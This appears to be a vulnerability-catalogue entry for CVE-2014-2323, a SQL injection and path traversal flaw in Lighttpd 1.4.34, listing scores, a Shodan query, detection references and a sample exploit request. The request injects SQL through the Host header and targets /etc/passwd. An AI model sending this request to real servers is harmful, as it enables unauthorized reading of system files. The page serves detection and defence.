🔙 목록으로 돌아가기

CVE-2014-2323: Lighttpd 1.4.34 SQL Injection and Path Traversal

TitleLighttpd 1.4.34 SQL Injection and Path Traversal
Authorgeeknik
SeverityCritical
ImpactSuccessful exploitation of these vulnerabilities could lead to unauthorized access to sensitive data and remote code execution
RemediationUpgrade to a patched version of Lighttpd or apply the necessary security patches
CVSS Score9.8
EPSS Score0.92388
CVE IDCVE-2014-2323
CWE IDCWE-89
Shodan Querycpe:"cpe:2.3:a:lighttpd:lighttpd"
Tags cve2014 cve lighttpd injection seclists sqli vuln

🔍 Vulnerability Description

A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).

🌐 HTTP Request

GET /etc/passwd HTTP/1.1
Host: [::1]' UNION SELECT '/

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-2323.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-2323.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A